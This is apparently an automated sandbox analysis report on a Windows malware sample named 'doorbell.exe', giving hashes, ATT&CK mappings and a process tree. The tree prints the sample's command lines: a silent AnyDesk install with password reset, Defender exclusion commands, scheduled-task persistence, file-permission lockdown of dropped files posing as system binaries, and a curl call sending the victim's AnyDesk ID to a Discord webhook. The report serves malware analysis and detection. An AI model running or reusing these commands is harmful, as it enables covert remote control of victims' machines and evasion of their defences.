70189f25f897d5552836c1f5aa63e54e41b9bb96d020eea26ac5e843cf412db6

Analysis

max time kernel
117s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
25/04/2024, 17:26

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

doorbell.exe
Size

5.4MB
MD5

a76cce482ac33469a6ac4ff1a3954e94
SHA1

123582a8774063482c335327adf8371bdeb4a11d
SHA256

70189f25f897d5552836c1f5aa63e54e41b9bb96d020eea26ac5e843cf412db6
SHA512

a72bfe05e0728322e71afb003bf339fd6d4d03a235b539c470c212253f43cf9cefa8507f9adfc0ffa739fc691d1aa31040a9fa2e6935f0ef19ec5bdc2efeabb1
SSDEEP

98304:yAsnFPXjajaKETkyD/Y6cRU4KaMCnahK4munHdQJS51M7RzPJ9J3rluSn/Od:yTnFPXjTKgwDgbhK4muHdQJSM7Rzh9J8

Score

7^/10

discovery

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	doorbell.exe

Executes dropped EXE 8 IoCs

pid	Process
5060	AnyDesk.exe
632	AnyDesk.exe
4992	AnyDesk.exe
2352	AnyDesk.exe
5028	AnyDesk.exe
3356	AnyDesk.exe
3940	AnyDesk.exe
1916	AnyDesk.exe

Modifies file permissions 1 TTPs 16 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4960	icacls.exe
556	icacls.exe
3532	icacls.exe
4576	icacls.exe
1004	icacls.exe
3536	icacls.exe
2224	icacls.exe
1896	icacls.exe
3876	icacls.exe
772	icacls.exe
2868	icacls.exe
772	icacls.exe
4872	icacls.exe
672	icacls.exe
3508	icacls.exe
3616	icacls.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
81	discord.com
82	discord.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4576	schtasks.exe
4368	schtasks.exe
2224	schtasks.exe
2004	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2400	timeout.exe

Modifies registry class 16 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\AnyDesk.exe\" \"%1\""	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Local\\AnyDesk.exe\",0"	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\AnyDesk.exe\" --play \"%1\""	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	AnyDesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	AnyDesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	AnyDesk.exe

Suspicious behavior: EnumeratesProcesses 61 IoCs

pid	Process
632	AnyDesk.exe
632	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
5060	AnyDesk.exe
2352	AnyDesk.exe
2352	AnyDesk.exe
3356	AnyDesk.exe
3356	AnyDesk.exe
3940	AnyDesk.exe
3940	AnyDesk.exe
4180	powershell.exe
4180	powershell.exe
4180	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
2028	powershell.exe
2028	powershell.exe
2028	powershell.exe
3356	powershell.exe
3356	powershell.exe
3356	powershell.exe
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
832	powershell.exe
832	powershell.exe
832	powershell.exe
4960	powershell.exe
4960	powershell.exe
4960	powershell.exe
3976	powershell.exe
3976	powershell.exe
3976	powershell.exe
2540	powershell.exe
2540	powershell.exe
2540	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	4180	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeRestorePrivilege	672	icacls.exe
Token: SeRestorePrivilege	772	icacls.exe
Token: SeRestorePrivilege	2224	icacls.exe
Token: SeRestorePrivilege	3532	icacls.exe
Token: SeRestorePrivilege	2868	icacls.exe
Token: SeRestorePrivilege	556	icacls.exe
Token: SeRestorePrivilege	4872	icacls.exe
Token: SeRestorePrivilege	772	icacls.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
4992	AnyDesk.exe
4992	AnyDesk.exe
4992	AnyDesk.exe
5028	AnyDesk.exe
5028	AnyDesk.exe
5028	AnyDesk.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4992	AnyDesk.exe
4992	AnyDesk.exe
4992	AnyDesk.exe
5028	AnyDesk.exe
5028	AnyDesk.exe
5028	AnyDesk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2088 wrote to memory of 3080	2088	doorbell.exe	86
PID 2088 wrote to memory of 3080	2088	doorbell.exe	86
PID 3080 wrote to memory of 5060	3080	cmd.exe	88
PID 3080 wrote to memory of 5060	3080	cmd.exe	88
PID 3080 wrote to memory of 5060	3080	cmd.exe	88
PID 5060 wrote to memory of 632	5060	AnyDesk.exe	91
PID 5060 wrote to memory of 632	5060	AnyDesk.exe	91
PID 5060 wrote to memory of 632	5060	AnyDesk.exe	91
PID 5060 wrote to memory of 4992	5060	AnyDesk.exe	92
PID 5060 wrote to memory of 4992	5060	AnyDesk.exe	92
PID 5060 wrote to memory of 4992	5060	AnyDesk.exe	92
PID 3080 wrote to memory of 3356	3080	cmd.exe	113
PID 3080 wrote to memory of 3356	3080	cmd.exe	113
PID 3080 wrote to memory of 3356	3080	cmd.exe	113
PID 3080 wrote to memory of 2316	3080	cmd.exe	106
PID 3080 wrote to memory of 2316	3080	cmd.exe	106
PID 3080 wrote to memory of 3940	3080	cmd.exe	107
PID 3080 wrote to memory of 3940	3080	cmd.exe	107
PID 3080 wrote to memory of 3940	3080	cmd.exe	107
PID 3080 wrote to memory of 4180	3080	cmd.exe	108
PID 3080 wrote to memory of 4180	3080	cmd.exe	108
PID 3080 wrote to memory of 4500	3080	cmd.exe	136
PID 3080 wrote to memory of 4500	3080	cmd.exe	136
PID 3080 wrote to memory of 2028	3080	cmd.exe	112
PID 3080 wrote to memory of 2028	3080	cmd.exe	112
PID 3080 wrote to memory of 3356	3080	cmd.exe	113
PID 3080 wrote to memory of 3356	3080	cmd.exe	113
PID 3080 wrote to memory of 1004	3080	cmd.exe	156
PID 3080 wrote to memory of 1004	3080	cmd.exe	156
PID 3080 wrote to memory of 832	3080	cmd.exe	116
PID 3080 wrote to memory of 832	3080	cmd.exe	116
PID 3080 wrote to memory of 4960	3080	cmd.exe	150
PID 3080 wrote to memory of 4960	3080	cmd.exe	150
PID 3080 wrote to memory of 3976	3080	cmd.exe	158
PID 3080 wrote to memory of 3976	3080	cmd.exe	158
PID 3080 wrote to memory of 2540	3080	cmd.exe	120
PID 3080 wrote to memory of 2540	3080	cmd.exe	120
PID 3080 wrote to memory of 3452	3080	cmd.exe	121
PID 3080 wrote to memory of 3452	3080	cmd.exe	121
PID 3080 wrote to memory of 1004	3080	cmd.exe	156
PID 3080 wrote to memory of 1004	3080	cmd.exe	156
PID 3080 wrote to memory of 2224	3080	cmd.exe	140
PID 3080 wrote to memory of 2224	3080	cmd.exe	140
PID 3080 wrote to memory of 4576	3080	cmd.exe	141
PID 3080 wrote to memory of 4576	3080	cmd.exe	141
PID 3080 wrote to memory of 2004	3080	cmd.exe	142
PID 3080 wrote to memory of 2004	3080	cmd.exe	142
PID 3080 wrote to memory of 4368	3080	cmd.exe	126
PID 3080 wrote to memory of 4368	3080	cmd.exe	126
PID 3080 wrote to memory of 2400	3080	cmd.exe	127
PID 3080 wrote to memory of 2400	3080	cmd.exe	127
PID 3080 wrote to memory of 2804	3080	cmd.exe	129
PID 3080 wrote to memory of 2804	3080	cmd.exe	129
PID 2804 wrote to memory of 1916	2804	cmd.exe	130
PID 2804 wrote to memory of 1916	2804	cmd.exe	130
PID 2804 wrote to memory of 1916	2804	cmd.exe	130
PID 3080 wrote to memory of 3040	3080	cmd.exe	131
PID 3080 wrote to memory of 3040	3080	cmd.exe	131
PID 3080 wrote to memory of 4664	3080	cmd.exe	133
PID 3080 wrote to memory of 4664	3080	cmd.exe	133
PID 3080 wrote to memory of 672	3080	cmd.exe	134
PID 3080 wrote to memory of 672	3080	cmd.exe	134
PID 3080 wrote to memory of 3508	3080	cmd.exe	135
PID 3080 wrote to memory of 3508	3080	cmd.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
756	attrib.exe
4820	attrib.exe
4924	attrib.exe
4748	attrib.exe
4500	attrib.exe
4664	attrib.exe
2004	attrib.exe
4500	attrib.exe

C:\Users\Admin\AppData\Local\Temp\doorbell.exe
"C:\Users\Admin\AppData\Local\Temp\doorbell.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3393.tmp\3394.tmp\3395.bat C:\Users\Admin\AppData\Local\Temp\doorbell.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3080
- - \??\c:\users\Admin\downloads\AnyDesk.exe
    c:/users/Admin/downloads/anydesk.exe --install "C:\Users\Admin\AppData\Local" --silent
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - \??\c:\users\Admin\downloads\AnyDesk.exe
      "c:\users\Admin\downloads\AnyDesk.exe" --local-service
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:632
  - - \??\c:\users\Admin\downloads\AnyDesk.exe
      "c:\users\Admin\downloads\AnyDesk.exe" --local-control
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4992
- - C:\Users\Admin\AppData\Local\AnyDesk.exe
    "C:\Users\Admin\AppData\Local/anydesk.exe" --remove-password
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
    3⤵
    PID:2316
- - C:\Users\Admin\AppData\Local\AnyDesk.exe
    "C:\Users\Admin\AppData\Local/anydesk.exe" --set-password
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\Users\Admin\AppData\Local" -r -force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\Users\Admin\AppData\Local" -r -force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\Users\Admin\AppData\Local" -r -force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c rm "c:/users/Admin/downloads/anydesk.exe" -r -force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local/stn.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local/svchost.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local/conhost.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /TN stn /TR "C:\Users\Admin\AppData\Local/stn.exe" /RL highest /SC ONLOGON /F
    3⤵
    - Creates scheduled task(s)
    PID:2224
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /TN anydesk /TR "C:\Users\Admin\AppData\Local/anydesk.exe" /RL highest /SC ONLOGON /RU Admin /F
    3⤵
    - Creates scheduled task(s)
    PID:4576
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /TN svchost /TR "C:\Users\Admin\AppData\Local/svchost.exe" /RL highest /SC ONLOGON /RU Admin /F
    3⤵
    - Creates scheduled task(s)
    PID:2004
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /TN conhost /TR "C:\Users\Admin\AppData\Local/conhost.exe" /RL highest /SC ONLOGON /RU Admin /F
    3⤵
    - Creates scheduled task(s)
    PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /T 2 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\anydesk.exe" --get-id
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Users\Admin\AppData\Local\AnyDesk.exe
      C:\Users\Admin\AppData\Local\anydesk.exe --get-id
      4⤵
      Executes dropped EXE
      PID:1916
- - C:\Windows\system32\curl.exe
    curl -k -F "payload_json={\"content\": \"Admin - 1277301813 \"}" https://discord.com/api/webhooks/1228908008927662171/5Ob8OGpz6Kf61ZEvVh8-_VgaEwleX05VhcESKKjdbwIrkq5ymuOyWSIdwmq6eB2pWft0
    3⤵
    PID:3040
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/stn.exe"
    3⤵
    - Views/modifies file attributes
    PID:4664
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/stn.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:672
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:3508
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/anydesk.exe"
    3⤵
    - Views/modifies file attributes
    PID:4500
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/anydesk.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:1896
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/svchost.exe"
    3⤵
    - Views/modifies file attributes
    PID:4748
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/svchost.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2224
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:4576
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/conhost.exe"
    3⤵
    - Views/modifies file attributes
    PID:2004
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/conhost.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3532
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:3536
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/stn.exe"
    3⤵
    - Views/modifies file attributes
    PID:4924
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/stn.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2868
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:3876
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/anydesk.exe"
    3⤵
    - Views/modifies file attributes
    PID:4820
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/anydesk.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:4960
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/svchost.exe"
    3⤵
    - Views/modifies file attributes
    PID:756
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/svchost.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4872
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:3616
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local/conhost.exe"
    3⤵
    - Views/modifies file attributes
    PID:4500
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/conhost.exe" /setowner "SYSTEM"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Local/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
    3⤵
    - Modifies file permissions
    PID:1004

C:\Users\Admin\AppData\Local\AnyDesk.exe
"C:\Users\Admin\AppData\Local\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2352

C:\Users\Admin\AppData\Local\AnyDesk.exe
"C:\Users\Admin\AppData\Local\AnyDesk.exe" --control
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5028

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\AnyDesk\service.conf

Filesize
2KB

MD5
bfb093e8c0cee846689ec74a25cb065e

SHA1
6fd3fc267f8e96e8b46e3e4d1a831e93bfb2ce36

SHA256
0650f2ec46578bd9d4f8caf59992624813055551075aaaaa280a0bf25e2fee08

SHA512
1c6c1169a2587cd4a03b15f828a63af351d209d78cfc86bc980320ba38caf93cc3b451db140cc1ae290e09376dd64363bd18f5328e299158fb3e2d7534375a8f

Download Submit
C:\ProgramData\AnyDesk\service.conf

Filesize
2KB

MD5
2b38267fb3788dfb845719db6ed88f1f

SHA1
2cd106739c8fb1188f451080a31490d446fc22ec

SHA256
06b26661b9c2fc23d9bbd0db31587fbc123566ddbf1fcf1657d3cfe7a465f719

SHA512
91774d3e3dfe666fa419935ab9a77b538d486eaf70e0741048fe60147ede3a427a36a365d6e0adbc18930d0c184da159669cb6787cf2638419d61ba951aa18fe

Download Submit
C:\ProgramData\AnyDesk\service.conf

Filesize
3KB

MD5
e639872f4cef4a4e1075e54da7177dcc

SHA1
c0157776a3a71148baf9370caf75c20e71febd5e

SHA256
544dd11817bae51131a36f989ed4b2a5a7093363c9bd13b1c445aacf83c5acc6

SHA512
60ae507e4d6e2138f1bdbf3aa0da388d64c79e68badaafdd749e8d563fd803de5681921b515f6fc7d73980813252049b55aabaedffb235f0dd364588091b520d

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
370B

MD5
afdc4f69f4720b8c4153f6186f49a2b6

SHA1
329c27ea36d7913809b0c239bb58e91d2ee468ac

SHA256
9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571

SHA512
3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
482B

MD5
cc9bea165f5c34d3ce27f44c414199d5

SHA1
eafb43a1570827e5c87f28823aa879a73e8ed4fe

SHA256
4a1a9bc4ecfbdea81eae4eeba94f51086e2e04b5fb8dda08910196d927228cfc

SHA512
2995b9d74b604d2886fa0fae201690a8da3c796921e19700d42d53b130430f9825e632f13383525d6a5191333461df7ccba7691e067a360490d46d6eb802e056

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
670B

MD5
071eee897c6260720fd0dcf8d1f47d6f

SHA1
04e24707a6d994d22e75fc460b84b60e52b1494c

SHA256
51815b7a5a74e7ac4e95f5fa97c69fe1000e56a6f043870f7d170b657bbd43fd

SHA512
aba40574fcc0691fe47a51e4972c2e649f7d2e842cb63e5ea96ad0afe581fc2cb1fc3865d32710691f05eed47a8edb53d96012daae38692b8a7ffc363976204d

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
791B

MD5
9925458874aa03d452248271efd2a7f5

SHA1
4cc1ce8190c1fd7d48bb344bbbaaaa5c1c7bec37

SHA256
992f915293420435fb69ddcc2ac590042819033e04e48b4743d366efa6cbc390

SHA512
0cb26df95e5d3281fab70044949eb8ec6e51c5f73803daf869b90549f29be3f0ba4b799965c3af7ff60e992c7f7a3765a58faf71f2440529ed9a1ce62c215632

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
1000B

MD5
709469b15e5b1f2692378859e8fbe26a

SHA1
b14faff2971fd1be7ca79c49e96157a946add1da

SHA256
fb2814e40d29bdc266880c22b79b642e085168021e29f2cf3988f0758f567ead

SHA512
a68417f49ca1c786658a07a927aa374221370aa0f602f21b7df85dbb2e8ce1404f482760c6fd52f86b2280b8f2cecc99c5db5e1c0664357f37ad9133be100c33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2dcc306cb1a0d2dc0fd5971b059f67a0

SHA1
a25b818722bb8c84c2e8f4091c5fd563527dd14a

SHA256
97ae46cc802d3d92601c22e5edcc71ec41b9c522ec6e748dc7356beb14de2016

SHA512
c8a11fa5b58ac9256b6d6552a0228a54634f70023c93562ae3b5558374faebcc3da404e64e6cc2ed7b2d77b3505032d88d4eaf2474968aebd1e6f1fe089daeb0

Download Submit
